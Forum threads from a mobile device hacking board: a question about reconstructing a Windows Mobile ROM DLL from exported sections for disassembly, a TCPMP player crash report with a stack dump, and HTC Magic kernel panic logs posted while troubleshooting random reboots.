Dll rebuild - Windows Mobile Development and Hacking General

Does anyone know how to rebuild a system dll in rom after exporting it using viewimgfs tool?
I mean that after the exporting I have these files:
imageinfo.bin
imageinfo.txt
S000
S001
S002
S003
S004
...I would like to have xyz.dll.
Thanks.
Bye Sektor

I know
Just take any PE-editor, take an empty PE-file and insert there these sections while giving them base/RVA/size/etc from imageinfo.txt. And edit PE-header (resources/imports/etc). Of cause you'll get an unworking DLL, but you would be able to decompile it or extract resources.
It is easy to make a program that would automatically reconstruct such DLLs, but I'm too lazy for this.

Thanks for your reply.
Can I ask you another little help?
I'm trying to use Ida to decompile my S000 file: when I run it I choose ARM Processor as Processor Type and then it asks me information about ROM and Input file. The info required are:
ROM: ROM start address, ROM size
Input file: Loading address, File offset, Loading size
Using the data in the imageinfo.txt, attached below, I compile the form as following:
ROM start address: 0x01BD0000
ROM size: 0x0004A000
Loading address: 0x01BD1000
File offset: 0x00001000
Loading size: 0x00046158
...but Ida seems to not decompile it correctly.
Could you suggest me a good Pe-Editor?
Thanks in advance.
Bye Sektor
[imageinfo.txt]
Module name: ril.dll
e32_objcnt: 00000004
e32_imageflags: 0000212E
e32_entryrva: 000458FC
e32_vbase: 01BD0000
e32_subsysmajor: 00000005
e32_subsysminor: 00000001
e32_stackmax: 00010000
e32_vsize: 0004A000
e32_sect14rva: 00000000
e32_sect14size: 00000000
e32_timestamp: 5598523F
e32_unit[0].rva: 00045D40
e32_unit[0].size: 00001415
e32_unit[1].rva: 00045C24
e32_unit[1].size: 0000003C
e32_unit[2].rva: 00000000
e32_unit[2].size: 00000000
e32_unit[3].rva: 00049000
e32_unit[3].size: 00000DD8
e32_unit[4].rva: 00000000
e32_unit[4].size: 00000000
e32_unit[5].rva: 0004A000
e32_unit[5].size: 00001000
e32_unit[6].rva: 00001000
e32_unit[6].size: 0000001C
e32_unit[7].rva: 00000000
e32_unit[7].size: 00000000
e32_unit[8].rva: 00000000
e32_unit[8].size: 00000000
e32_subsys: 00000009
o32[0].o32_vsize: 00046155
o32[0].o32_rva: 00001000
o32[0].o32_psize: 00046158
o32[0].o32_dataptr: 20000201
o32[0].o32_realaddr: 01BD1000
o32[0].o32_flags: 60002020
o32[1].o32_vsize: 00000558
o32[1].o32_rva: 00048000
o32[1].o32_psize: 00000558
o32[1].o32_dataptr: 00000000
o32[1].o32_realaddr: 01C18000
o32[1].o32_flags: C0002040
o32[2].o32_vsize: 00000DD8
o32[2].o32_rva: 00049000
o32[2].o32_psize: 00000DD8
o32[2].o32_dataptr: 00000000
o32[2].o32_realaddr: 01C19000
o32[2].o32_flags: 40002040
o32[3].o32_vsize: 00001000
o32[3].o32_rva: 0004A000
o32[3].o32_psize: 00000920
o32[3].o32_dataptr: 10000000
o32[3].o32_realaddr: 00000000
o32[3].o32_flags: 42002042

there are lots of PE-editors, for example PEditor. Look at protools.cjb.net

Related

New problems after updating Mogul firmware

TCPMP:
I get the following in crash.txt:
TCPMP 0.72RC1 crash report
----------------------------
Access violation(c0000005) at 782d49ec 782d49ec)
Read from 782d49ec
cpu dump:
R0 = a22cb3c3
R1 = 00000000
R2 = a22cb3c3
R3 = ffffcbac
R4 = 01a00130
R5 = 00012000
R6 = 00012010
R7 = 00000003
R8 = 179ffed8
R9 = 179ffed8
R10 = 782826a8 (common:000016a8)
R11 = 179ffd04
R12 = a22cb3c3
Sp = 179ffcd8
Lr = 78282798 (common:00001798)
Pc = 782d49ec
Psr = 6000001f
stack dump:
179ffcd8 78253f20
179ffcdc 0001318c
179ffce0 179ffed8
179ffce4 8204eeb0
179ffce8 421b89ee
179ffcec 78253f48
179ffcf0 00000000
179ffcf4 a34f00aa
179ffcf8 ffffc894
179ffcfc 179ffd04
179ffd00 00011108
179ffd04 00000000
179ffd08 00000000
179ffd0c 8389f7e0
179ffd10 00000000
179ffd14 00011424
179ffd18 01ffcc94
179ffd1c 01ffc9e0
179ffd20 179ffed8
179ffd24 a34f00aa
179ffd28 ffffc894
179ffd2c 8001cbd0
179ffd30 00000047
179ffd34 a34f00aa
179ffd38 00000000
179ffd3c 179ffed8
179ffd40 00000005
179ffd44 8389f7e0
179ffd48 00000000
179ffd4c 00011424
179ffd50 01ffcc94
179ffd54 01ffc9e0
179ffd58 179ffed8
179ffd5c a34f00aa
179ffd60 ffffc894
179ffd64 03f68ad8
179ffd68 179ffe44
179ffd6c 03f692e8
179ffd70 00011424
179ffd74 8000001f
179ffd78 01ffcc94
179ffd7c 80032c6c
179ffd80 0000c7b2
179ffd84 8005006c
179ffd88 179fc7b2
179ffd8c 03f6dc40
179ffd90 00000000
179ffd94 00000000
179ffd98 0da03ab8
179ffd9c 0d9e0000
179ffda0 0d9e0030
179ffda4 00000014
179ffda8 82c9fe40
179ffdac 00000000
179ffdb0 00000000
179ffdb4 828a5400
179ffdb8 8034c2d0
179ffdbc 821b89ec
179ffdc0 82c9fe40
179ffdc4 00000000
179ffdc8 f000fe38
179ffdcc 179ffe10
179ffdd0 8001f0ac
179ffdd4 00000000
179ffdd8 00004000
179ffddc 00000010
179ffde0 ffffcb48
179ffde4 ffffc894
179ffde8 00000000
179ffdec 8001f538
179ffdf0 00004000
179ffdf4 00000010
179ffdf8 ffffcb48
179ffdfc a22cb3c2
179ffe00 a34f00aa
179ffe04 00000001
179ffe08 8001c440
179ffe0c 03f68ad8
179ffe10 00000000
179ffe14 0000001f
179ffe18 a34f00aa
179ffe1c 00000000
179ffe20 179ffed8
179ffe24 00000005
179ffe28 01ffc9e0
179ffe2c 00011450
179ffe30 8389f7e0
179ffe34 00000000
179ffe38 00011424
179ffe3c 01ffcc94
179ffe40 03f692e8
179ffe44 00010000
179ffe48 00000000
179ffe4c 00000000
179ffe50 00000000
179ffe54 00000000
179ffe58 00000001
179ffe5c 00000000
179ffe60 00000000
179ffe64 00000000
179ffe68 00000000
179ffe6c 00000000
179ffe70 00000000
179ffe74 00000000
179ffe78 00000000
179ffe7c 00000000
179ffe80 00000000
179ffe84 00000000
179ffe88 00000000
179ffe8c 00000000
179ffe90 f000fe3c
179ffe94 c203fe7c
179ffe98 8003e87c
179ffe9c 8003e8ec
179ffea0 00000000
179ffea4 80000004
179ffea8 00000001
179ffeac 00000004
179ffeb0 8389f7e0
179ffeb4 00000000
179ffeb8 00000000
179ffebc 00010000
179ffec0 006c0070
179ffec4 00790061
179ffec8 00720065
179ffecc 0065002e
179ffed0 00650078
179ffed4 00000000
179ffed8 00000000
179ffedc 00000000
179ffee0 00000000
179ffee4 16000000
179ffee8 00000002
179ffeec 00000001
179ffef0 00020000
179ffef4 00000000
179ffef8 179fd000
179ffefc 179e0000
179fff00 7c090950
179fff04 179ffe50
179fff08 00000000
179fff0c 00000000
179fff10 00000000
179fff14 01a01840
179fff18 00000000
179fff1c 00000000
179fff20 00000000
179fff24 00000000
179fff28 00000000
179fff2c 00000000
179fff30 00000000
179fff34 00000000
179fff38 00000000
179fff3c 00000000
179fff40 00000000
179fff44 00000000
179fff48 00000000
179fff4c 00000000
179fff50 00000000
179fff54 00000000
179fff58 00000000
179fff5c 00000000
179fff60 00000000
179fff64 00000000
179fff68 00000000
179fff6c 00000000
179fff70 00000000
179fff74 00000000
179fff78 00000000
179fff7c 00000000
179fff80 00000000
179fff84 00000000
179fff88 00000000
179fff8c 00000000
179fff90 00000000
179fff94 00000000
179fff98 00000000
179fff9c 00000000
179fffa0 00000000
179fffa4 00000000
179fffa8 00000000
179fffac 00000000
179fffb0 00000000
179fffb4 00000000
179fffb8 00000000
179fffbc 00000000
179fffc0 00000000
179fffc4 00000000
179fffc8 00000000
179fffcc 00000000
179fffd0 00000000
179fffd4 00000000
179fffd8 00000000
179fffdc 00000000
179fffe0 00000000
179fffe4 00000000
179fffe8 00000000
179fffec 00000000
179ffff0 00000000
179ffff4 00000000
179ffff8 00000000
179ffffc 00000000
17a00000 50616548
17a00004 00000000
17a00008 00000000
17a0000c 00002000
17a00010 00000000
17a00014 03f6d4ac
17a00018 03f6d4c0
17a0001c 00000001
17a00020 00000000
17a00024 81ce0438
17a00028 00000000
17a0002c 00000000
17a00030 17a02578
17a00034 17a00030
17a00038 00010c31
17a0003c 17a1dce8
17a00040 17a00000
17a00044 00000000
17a00048 00000000
17a0004c 00000000
17a00050 00000000
17a00054 00000000
17a00058 ffffff80
17a0005c 17a00030
17a00060 0050005c
17a00064 006f0072
17a00068 00720067
17a0006c 006d0061
17a00070 00460020
17a00074 006c0069
17a00078 00730065
17a0007c 0054005c
17a00080 00500043
17a00084 0050004d
17a00088 0069005c
17a0008c 0074006e
17a00090 00720065
17a00094 00610066
17a00098 00650063
17a0009c 0070002e
17a000a0 0067006c
17a000a4 00000000
17a000a8 ffffffd0
17a000ac 17a00030
17a000b0 00790061
17a000b4 00730067
17a000b8 00650068
17a000bc 006c006c
17a000c0 0064002e
17a000c4 006c006c
17a000c8 00000000
17a000cc 00000000
17a000d0 00000000
17a000d4 00000000
common 78281000-782cc000 obj:0 class:30
General (0x01a01600)
Language(16)=1600081477
Platform(23)=PocketPC
Ver(25)=502
OS Version(27)=5.02
OEM Info(24)=TITA100
TypeNo(26)=1
Model(18)=0
Caps(19)=0x00008000
Processor(17)=ARM
Clock speed(34)=390
ICache(20)=32768
DCache(21)=32768
(37)=10
(38)=0
Advanced (0x01a01920)
No backlight keepalive for video(32)=No
Home Screen time out with music playback(45)=No
Old style toolbars(31)=No
No wireless MMX usage(40)=No
Slow video memory(37)=Yes
Less rotation tearing (slower)(41)=No
Prefer lookup tables over arithmetic(38)=Yes
D-Pad follow screen orientation(56)=Yes
Prefer less buffering over smooth video(54)=No
Use system volume(52)=No
Benchmark from current position(48)=No
Override AVI frame rate based on audio(53)=No
Widcomm BT Audio button support(58)=No
Disable AVC deblocking filter(65)=No
Manual A/V offset +/-(44)=0.00 ms
Soft-drop tolerance(42)=54.99 ms
Hard-drop tolerance(43)=699.95 ms
(59)=No
System Timer (0x01a01c70)
Time(96)=0
Speed(98)=100.00%
Play(99)=No
Wave Output (0x01a01e20)
Input(32):IN=empty packet format
Input(32):IN=NULL
Output(33):OUT=empty packet format
Total(34)=0
Dropped(35)=0
Volume(81)=60
Mute(82)=No
(89)=0
Quality(83)=2
(90)=No
(91)= (0x01a01e30)
NULA AOUT p:1 r:1 c: e: p: m:common
OVLA VOUT p:1 r:1 c: e: p: m:common
RAWA FMTB p:1 r:1 c: e: p: m:common
FMTB FMT_ p:1 r:1 c: e: p: m:common
CODC FLOW p:1 r:1 c: e: p: m:common
CCID FLOW p:1 r:1 c: e: p: m:common
NODE p:0 r:1 c: e: p: m:common
FILE STRM p:1 r:1 c:file e: p: m:common
WAVE AOUT p:1 r:1 c: e: p: m:common
RAWI FMTB p:1 r:1 c: e: p: m:common
FMTL FMTM p:1 r:1 c: e: p: m:common
STRM NODE p:1 r:1 c: e: p: m:common
FMTM NODE p:1 r:1 c: e: p: m:common
ADMO CODC p:1 r:1 c: e: p: m:common
STRP FMTM p:1 r:1 c: e: p: m:common
OUTP FLOW p:1 r:1 c: e: p: m:common
ADVP NODE p:1 r:1 c: e: p: m:common
TIMR NODE p:1 r:1 c: e: p: m:common
MEMS STRM p:1 r:1 c: e: p: m:common
PLAT NODE p:1 r:1 c: e: p: m:common
IDCT FLOW p:1 r:1 c: e: p: m:common
SYST TIMR p:1 r:1 c: e: p: m:common
AOUT OUTP p:1 r:1 c: e: p: m:common
VOUT OUTP p:1 r:1 c: e: p: m:common
NULV VOUT p:1 r:1 c: e: p: m:common
FLOW NODE p:1 r:1 c: e: p: m:common
RASX FMTL p:1 r:1 c: e:asx;wmx;wmweb;wmwebasf;wmwebasx;wvx:V;wax:A p:and(text,scan(64,stri('<ASX'),0,fwd)) m:common
PLS_ FMTL p:1 r:1 c:audio/x-scpls,audio/scpls els p:and(text,scan(64,stri('[playlist]'),0,fwd)) m:common
FMT_ FMTM p:1 r:1 c: e: p: m:common
M3U_ FMTL p:1 r:1 c:audio/x-mpegurl,audio/mpegurl e:m3u p:and(text,gt(512,length),or(eq(lines,1),eq(lines,0))) m:common
Bump #1!
Well, aside from the previous post - I found what I thought was a zip file that would work, but I copied it over to the phone and found out it was about 30 MB worth of C++ Source Code files, and no appication included. Does anyone know where I can find a working, compiled, and tested version of TCPMP that works with WM 6.1 on the Titan/Mogul?
Using CAB or OEM
How are you going to load it to your phone. I am using an OEM. Try these CABs if that is what you use to install or this OEM. The oem works for me.
Thank you! Flash videos now play on my phone!

HTC Magic 32A random reboots with any non-htc kernel

Hi, I'm hoping that someone on here has a clue about what's happening with this HTC Magic 32A.
What I'm seeing is ROMS with a custom kernel (e.g. the bc kernel) on an Amon_RA or Cyanogen ROM is that the phone randomly reboots. It could be sitting on the table, doing nothing.. or could be in use.
I've used a couple of older ROMS, which included a HTC kernel, and they were always stable.
If it helps, I managed to grab a couple of /proc/last_kmsg's after reboots, but I don't really know what's causing the problem.
Code:
[ 358.834381] PM: Syncing filesystems ... done.
[ 358.840209] Freezing user space processes ... (elapsed 0.01 seconds) done.
[ 358.858886] Freezing remaining freezable tasks ... (elapsed 0.00 seconds) done.
[ 358.864990] wakeup wake lock: tiwlan_irq_wake
[ 358.871337] Restarting tasks ... done.
[ 358.877929] suspend: exit suspend, ret = 0 (2009-12-10 03:02:28.507171631 UTC)
[ 358.882080] PM: Syncing filesystems ... done.
[ 358.886291] Freezing user space processes ... (elapsed 0.01 seconds) done.
[ 358.901367] Freezing remaining freezable tasks ... (elapsed 0.00 seconds) done.
[ 358.910675] wakeup wake lock: tiwlan_irq_wake
[ 358.914611] Restarting tasks ... <1>Unable to handle kernel NULL pointer dereference at virtual address 0000001c
[ 358.920684] pgd = cb9b0000
[ 358.920928] [0000001c] *pgd=24b9a031, *pte=00000000, *ppte=00000000
[ 358.922058] Internal error: Oops: 17 [#1] PREEMPT
[ 358.922302] Modules linked in: wlan
[ 358.923004] CPU: 0 Not tainted (2.6.29.6-cm42 #2)
[ 358.923492] PC is at rb_erase+0xdc/0x360
[ 358.923767] LR is at __dequeue_entity+0x38/0x3c
[ 358.924194] pc : [<c0189dd8>] lr : [<c0049bd4>] psr: 20000093
[ 358.924224] sp : c5031d20 ip : c5031d40 fp : c5031d3c
[ 358.924896] r10: 00000000 r9 : c02edb50 r8 : c50f052c
[ 358.925140] r7 : 00000001 r6 : cb9a86d0 r5 : cb9a86f0 r4 : 00040cf1
[ 358.925598] r3 : 00000000 r2 : 0000001c r1 : cb9a86f0 r0 : c03ee198
[ 358.925842] Flags: nzCv IRQs off FIQs on Mode SVC_32 ISA ARM Segment user
[ 358.926269] Control: 00c5387d Table: 24bb0008 DAC: 00000015
[ 358.926513]
[ 358.926513] PC: 0xc0189d58:
[ 358.927185] 9d58 15821000 e5901000 e1540000 e5831000 e5901000 05842004 15842008 e5907004
[ 358.929504] 9d78 e5906008 01a04003 e3d11003 e5837004 e5836008 05853000 0a000003 e5916008
[ 358.931976] 9d98 e1560000 05813008 15813004 e9900042 e5960000 e3510000 e2000003 e1830000
[ 358.934478] 9db8 e5860000 15910000 12000003 11833000 15813000 ea00000e e3520000 e5904000
[ 358.936950] 9dd8 15923000 e204c001 12033003 e3c44003 11833004 15823000 e3540000 05852000
[ 358.939239] 9df8 0a000003 e5943008 e1530000 05842008 15842004 e35c0001 189da8f0 ea000082
[ 358.941711] 9e18 e5943008 e1530002 1a00003b e5943004 e5932000 e3120001 1a000008 e3822001
[ 358.944183] 9e38 e5832000 e5943000 e1a00004 e3c33001 e5843000 e1a01005 ebffff21 e5943004
[ 358.946441]
[ 358.946441] LR: 0xc0049b54:
[ 358.947113] 9b54 13e00015 03a00000 e89da830 c02edb50 e1a0c00d e92dd800 e24cb004 e5903318
[ 358.949584] 9b74 e2611014 e59331c0 e1510003 93a00001 989da800 e3a00017 eb004647 e2500000
[ 358.951904] 9b94 13a00001 e89da800 e1a0c00d e92dd830 e24cb004 e5903024 e2815008 e1530005
[ 358.954376] 9bb4 e1a04000 1a000002 e1a00005 eb05013b e5840024 e1a00005 e2841020 eb050049
[ 358.956848] 9bd4 e89da830 e1a0c00d e92dd8f0 e24cb004 e591301c e1a04001 e3530000 e1a05000
[ 358.959075] 9bf4 0a000029 e5902044 e3a03ffe e0822003 e1c165d0 e1c220d0 e591105c e5940058
[ 358.961547] 9c14 e0522006 e0c33007 e1510003 e1a0c003 8a000002 1a000003 e1500002 9a000001
[ 358.964080] 9c34 e1a02000 e1a0c001 e1c406d0 e5842058 e3a02001 e0900002 e3a03000 e0a11003
[ 358.966369]
[ 358.966369] SP: 0xc5031ca0:
[ 358.966827] 1ca0 c006e248 c006e1d4 c50f02c0 c03ee160 cea01000 914f1a84 ffffffff c5031d0c
[ 358.969329] 1cc0 cb9a86d0 00000001 c5031d3c c5031cd8 c00259ac c0025200 c03ee198 cb9a86f0
[ 358.971588] 1ce0 0000001c 00000000 00040cf1 cb9a86f0 cb9a86d0 00000001 c50f052c c02edb50
[ 358.974060] 1d00 00000000 c5031d3c c5031d40 c5031d20 c0049bd4 c0189dd8 20000093 ffffffff
[ 358.976531] 1d20 cb9a86d0 c03ee198 cb9a86d0 00000001 c5031d5c c5031d40 c0049bd4 c0189d08
[ 358.978820] 1d40 c03ee198 cb9a86d0 00000000 000003f8 c5031d7c c5031d60 c0049dd8 c0049be4
[ 358.981079] 1d60 c50f02c0 c03ee160 c5030000 000003f8 c5031dc4 c5031d80 c02e92bc c0049d54
[ 358.983581] 1d80 002ec000 00000000 c5031dc4 c50f052c c5031e40 00000000 c5031e60 00000000
[ 358.986083]
[ 358.986083] IP: 0xc5031cc0:
[ 358.986541] 1cc0 cb9a86d0 00000001 c5031d3c c5031cd8 c00259ac c0025200 c03ee198 cb9a86f0
[ 358.989044] 1ce0 0000001c 00000000 00040cf1 cb9a86f0 cb9a86d0 00000001 c50f052c c02edb50
[ 358.991333] 1d00 00000000 c5031d3c c5031d40 c5031d20 c0049bd4 c0189dd8 20000093 ffffffff
[ 358.993591] 1d20 cb9a86d0 c03ee198 cb9a86d0 00000001 c5031d5c c5031d40 c0049bd4 c0189d08
[ 358.996063] 1d40 c03ee198 cb9a86d0 00000000 000003f8 c5031d7c c5031d60 c0049dd8 c0049be4
[ 358.998565] 1d60 c50f02c0 c03ee160 c5030000 000003f8 c5031dc4 c5031d80 c02e92bc c0049d54
[ 359.001068] 1d80 002ec000 00000000 c5031dc4 c50f052c c5031e40 00000000 c5031e60 00000000
[ 359.003326] 1da0 c5031e4c c5030000 00000000 c5031e60 c041d7a0 002ec86c c5031ebc c5031dc8
[ 359.005828]
[ 359.005828] FP: 0xc5031cbc:
[ 359.006286] 1cbc c5031d0c cb9a86d0 00000001 c5031d3c c5031cd8 c00259ac c0025200 c03ee198
[ 359.008758] 1cdc cb9a86f0 0000001c 00000000 00040cf1 cb9a86f0 cb9a86d0 00000001 c50f052c
[ 359.011230] 1cfc c02edb50 00000000 c5031d3c c5031d40 c5031d20 c0049bd4 c0189dd8 20000093
[ 359.013732] 1d1c ffffffff cb9a86d0 c03ee198 cb9a86d0 00000001 c5031d5c c5031d40 c0049bd4
[ 359.015991] 1d3c c0189d08 c03ee198 cb9a86d0 00000000 000003f8 c5031d7c c5031d60 c0049dd8
[ 359.018493] 1d5c c0049be4 c50f02c0 c03ee160 c5030000 000003f8 c5031dc4 c5031d80 c02e92bc
[ 359.020965] 1d7c c0049d54 002ec000 00000000 c5031dc4 c50f052c c5031e40 00000000 c5031e60
[ 359.023254] 1d9c 00000000 c5031e4c c5030000 00000000 c5031e60 c041d7a0 002ec86c c5031ebc
[ 359.025726]
[ 359.025726] R0: 0xc03ee118:
[ 359.026397] e118 c03c7a58 c03c7a64 c03c7a70 c03c7a7c c03c7a88 c03c7a94 00003a98 e0131b08
[ 359.028686] e138 00000000 00000000 00000000 00000000 00000000 00000000 00000000 cc44c000
[ 359.031188] e158 cc46ebc0 00000000 0000008d 000030c4 00003d4a 00006848 00006322 00006709
[ 359.033691] e178 00000000 00000000 00000000 00040cf1 00000000 00004015 00af3216 00000000
[ 359.035949] e198 00040cf1 00000000 0000001c 00000000 784ca882 0000001b 8ebd0837 0000002e
[ 359.038421] e1b8 cb79efd8 cb9a86d8 c53e2744 cc582c64 00000000 00000000 00000000 cc582c50
[ 359.040924] e1d8 0000080a c03ee160 c03ee538 cba19188 c03eea58 00000000 00000000 00000000
[ 359.043365] e1f8 00000000 00000010 c03ee200 c03ee200 c03ee208 c03ee208 c03ee210 c03ee210
[ 359.045654]
[ 359.045654] R1: 0xcb9a8670:
[ 359.046325] 8670 00000002 ffffffff 00000000 00000001 ffffffff 00000000 00000000 00000000
[ 359.048583] 8690 00000000 00000000 00000000 00000000 00000000 cb9f0000 00000004 00400140
[ 359.051086] 86b0 00000000 ffffffff 00000078 00000078 00000078 00000000 c02edb50 00000000
[ 359.053558] 86d0 00000400 00400000 c6e0f2b9 c6e39298 00000000 cb806544 c6e392a4 00000001
[ 359.056030] 86f0 8f83f628 00040cf0 a1018b11 00000000 8e2471b7 0000002e a1018b11 00000000
[ 359.058319] 8710 00000000 00000000 00003629 00000000 00000000 00000000 074a5ed5 00000000
[ 359.060821] 8730 00004006 00000000 c2fbde43 00000001 00000000 00000000 eab7f810 00000025
[ 359.063293] 8750 e923f5af 00000047 00000000 00000000 1c7b530e 00000000 009933db 00000000
[ 359.065765]
[ 359.065795] R5: 0xcb9a8670:
[ 359.066253] 8670 00000002 ffffffff 00000000 00000001 ffffffff 00000000 00000000 00000000
[ 359.068695] 8690 00000000 00000000 00000000 00000000 00000000 cb9f0000 00000004 00400140
[ 359.070953] 86b0 00000000 ffffffff 00000078 00000078 00000078 00000000 c02edb50 00000000
[ 359.073455] 86d0 00000400 00400000 c6e0f2b9 c6e39298 00000000 cb806544 c6e392a4 00000001
[ 359.075958] 86f0 8f83f628 00040cf0 a1018b11 00000000 8e2471b7 0000002e a1018b11 00000000
[ 359.078430] 8710 00000000 00000000 00003629 00000000 00000000 00000000 074a5ed5 00000000
[ 359.080718] 8730 00004006 00000000 c2fbde43 00000001 00000000 00000000 eab7f810 00000025
[ 359.083007] 8750 e923f5af 00000047 00000000 00000000 1c7b530e 00000000 009933db 00000000
[ 359.085510]
[ 359.085510] R6: 0xcb9a8650:
[ 359.085968] 8650 00000000 00000000 00000000 00000000 cb9a2640 c6e06680 000006a0 cb9a86a0
[ 359.088439] 8670 00000002 ffffffff 00000000 00000001 ffffffff 00000000 00000000 00000000
[ 359.090942] 8690 00000000 00000000 00000000 00000000 00000000 cb9f0000 00000004 00400140
[ 359.093231] 86b0 00000000 ffffffff 00000078 00000078 00000078 00000000 c02edb50 00000000
[ 359.095489] 86d0 00000400 00400000 c6e0f2b9 c6e39298 00000000 cb806544 c6e392a4 00000001
[ 359.097961] 86f0 8f83f628 00040cf0 a1018b11 00000000 8e2471b7 0000002e a1018b11 00000000
[ 359.100219] 8710 00000000 00000000 00003629 00000000 00000000 00000000 074a5ed5 00000000
[ 359.102722] 8730 00004006 00000000 c2fbde43 00000001 00000000 00000000 eab7f810 00000025
[ 359.105194]
[ 359.105194] R8: 0xc50f04ac:
[ 359.105651] 04ac cbd222a0 cbd222a0 c50f04b4 c50f04b4 c535e49c c535f01c cb9a3200 c50f04c8
[ 359.107910] 04cc c50f04c8 c50f04d0 c50f04d0 00000000 c6d5ede8 c6d5ede0 cb729144 cb9a88c4
[ 359.110412] 04ec cc5e99e0 cb987410 cb9a88d0 c03ca990 cb9a343c c6d70dfc 00000000 00000000
[ 359.112640] 050c 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 359.114685] 052c 00000157 00000007 00000033 2c419d66 00000033 2c419d66 00000002 00000000
[ 359.117126] 054c 00000000 00000000 00000000 00000000 00000000 c50f0560 c50f0560 c50f0568
[ 359.119598] 056c c50f0568 c50f0570 c50f0570 cbceb1a0 cbceb1a0 00000001 c50f0584 c50f0584
[ 359.121887] 058c 206b7453 20707041 76726553 00656369 00000000 00000000 00000000 00000000
[ 359.124145]
[ 359.124145] R9: 0xc02edad0:
[ 359.124816] dad0 0004624c 00057ff5 0006dd25 000899bc 000abe5d 000d5d21 0010c73e 0014ff97
[ 359.127136] daf0 001a3434 0020ea87 00295252 003351fe 00400000 004fec05 00640e12 007c97d9
[ 359.129608] db10 009aee73 00c3a13e 00f0f0f1 0130d190 017d05f4 01de5d6e 0253c825 02f14990
[ 359.132080] db30 03a83a84 04924924 05b05b05 071c71c7 08d3dcb0 0b21642c 0e38e38e 11111111
[ 359.134368] db50 c02ed8c8 c004b210 c004af90 c004ac44 c004aa18 c0049d48 c004a950 c0049d18
[ 359.136657] db70 c004a88c c004b24c 00000000 c0048720 c00486c0 c004a85c c02edb50 c004f868
[ 359.139160] db90 c004c630 c0048768 c00487c4 c0049960 c004c60c c00488a4 c004c508 00000000
[ 359.141632] dbb0 00000000 c0048804 c004884c 00000000 54445352 00585a74 00000000 00000000
[ 359.143920] Process Stk App Service (pid: 292, stack limit = 0xc5030260)
[ 359.144378] Stack: (0xc5031d20 to 0xc5032000)
[ 359.144622] 1d20: cb9a86d0 c03ee198 cb9a86d0 00000001 c5031d5c c5031d40 c0049bd4 c0189d08
[ 359.147094] 1d40: c03ee198 cb9a86d0 00000000 000003f8 c5031d7c c5031d60 c0049dd8 c0049be4
[ 359.149353] 1d60: c50f02c0 c03ee160 c5030000 000003f8 c5031dc4 c5031d80 c02e92bc c0049d54
[ 359.151824] 1d80: 002ec000 00000000 c5031dc4 c50f052c c5031e40 00000000 c5031e60 00000000
[ 359.154113] 1da0: c5031e4c c5030000 00000000 c5031e60 c041d7a0 002ec86c c5031ebc c5031dc8
[ 359.156616] 1dc0: c007596c c02e9138 c004ad40 c004a654 c50f02f0 c5031e54 ffffffff 00000001
[ 359.159088] 1de0: c03ee198 cb9a86d8 c2a452ea 00000001 c5031e14 c5031e00 c5030000 c50f02c0
[ 359.161560] 1e00: 00000015 000003f8 c50f052c cb9a86a0 c5031e3c c5031e20 c006e1fc c006dbbc
[ 359.163848] 1e20: 00000000 000003f8 cb9f001c c50f02c0 c5031e54 c5031e40 c006e248 c006e1d4
[ 359.166107] 1e40: 00000064 c041d7a0 c041d7a0 c041d7a8 c041d7a8 c5031e84 c5031e84 c041d7a0
[ 359.168609] 1e60: 002ec000 cb614820 0000086e 00000000 c50f02c0 ffffffff 00000000 c50f02c0
[ 359.171112] 1e80: c004bd80 c5031e54 c5031e54 ffffffff c5031ebc 00000000 002ec86c 002ec868
[ 359.173400] 1ea0: 000000f0 c0025f24 ffffffff 00000001 c5031f44 c5031ec0 c00771ac c007570c
[ 359.175872] 1ec0: ffffffff 00000000 c5031f4c c50f05e0 c023190c 45a4fd60 c0186201 c0025f24
[ 359.178344] 1ee0: c5030000 42638f08 c5031f14 c5031ef8 c00c0998 c0231918 45a4fd60 cb7eaaa0
[ 359.180633] 1f00: c0186201 00000014 c5031f7c c5031f18 c00c1004 c00c0970 ffffffff 00000000
[ 359.183105] 1f20: 00000000 00000000 000000f0 c0025f24 c5030000 002ec86c c5031fa4 c5031f48
[ 359.185607] 1f40: c0077c80 c0077110 002ec868 00000000 ffffffff c0057744 cb7eaaa0 ffffffff
[ 359.188049] 1f60: c0186201 00000014 c0025f24 c5030000 c5031fa4 002ec868 002ec86c 002ec868
[ 359.190368] 1f80: 002ec86c 00000000 000000f0 c0025f24 c5030000 42638ed4 00000000 c5031fa8
[ 359.192840] 1fa0: c0025da0 c0077b54 002ec868 002ec86c 002ec86c 00000000 ffffffff 00000000
[ 359.195343] 1fc0: 002ec868 002ec86c 00000000 000000f0 ad00f380 002ebf20 42638ed4 002ebf20
[ 359.197875] 1fe0: ad080248 45a4fd08 afe0f5d4 afe0dc44 60000010 002ec86c 00000000 00000000
[ 359.200164] Backtrace:
[ 359.200836] [<c0189cfc>] (rb_erase+0x0/0x360) from [<c0049bd4>] (__dequeue_entity+0x38/0x3c)
[ 359.201812] r7:00000001 r6:cb9a86d0 r5:c03ee198 r4:cb9a86d0
[ 359.203155] [<c0049bd8>] (set_next_entity+0x0/0x140) from [<c0049dd8>] (pick_next_task_fair+0x90/0xa4)
[ 359.204315] r7:000003f8 r6:00000000 r5:cb9a86d0 r4:c03ee198
[ 359.205474] [<c0049d48>] (pick_next_task_fair+0x0/0xa4) from [<c02e92bc>] (schedule+0x190/0x444)
[ 359.206634] r7:000003f8 r6:c5030000 r5:c03ee160 r4:c50f02c0
[ 359.207763] [<c02e912c>] (schedule+0x0/0x444) from [<c007596c>] (futex_wait+0x26c/0x510)
[ 359.208923] [<c0075700>] (futex_wait+0x0/0x510) from [<c00771ac>] (do_futex+0xa8/0xa44)
[ 359.210083] [<c0077104>] (do_futex+0x0/0xa44) from [<c0077c80>] (sys_futex+0x138/0x14c)
[ 359.211212] [<c0077b48>] (sys_futex+0x0/0x14c) from [<c0025da0>] (ret_fast_syscall+0x0/0x2c)
[ 359.212188] Code: 15813000 ea00000e e3520000 e5904000 (15923000)
[ 359.214141] Kernel panic - not syncing: Fatal exception
[ 359.214508] apanic_writeflashpage: No panic_write available
[ 359.214965] apanic: Flash write failed (0)
Here's another:
Code:
[ 106.688842] Freezing user space processes ... <1>Unable to handle kernel paging request at virtual address 41b881d8
[ 106.699829] pgd = c530c000
[ 106.700286] [41b881d8] *pgd=1e513031, *pte=00000000, *ppte=00000000
[ 106.701202] Internal error: Oops: 817 [#1] PREEMPT
[ 106.701660] Modules linked in: wlan ramzswap
[ 106.702575] CPU: 0 Not tainted (2.6.29.6-cm42 #2)
[ 106.702850] PC is at set_next_entity+0xb4/0x140
[ 106.703308] LR is at pick_next_task_fair+0x90/0xa4
[ 106.703552] pc : [<c0049c8c>] lr : [<c0049dd8>] psr: 20000093
[ 106.703582] sp : c534be18 ip : 00000000 fp : c534be34
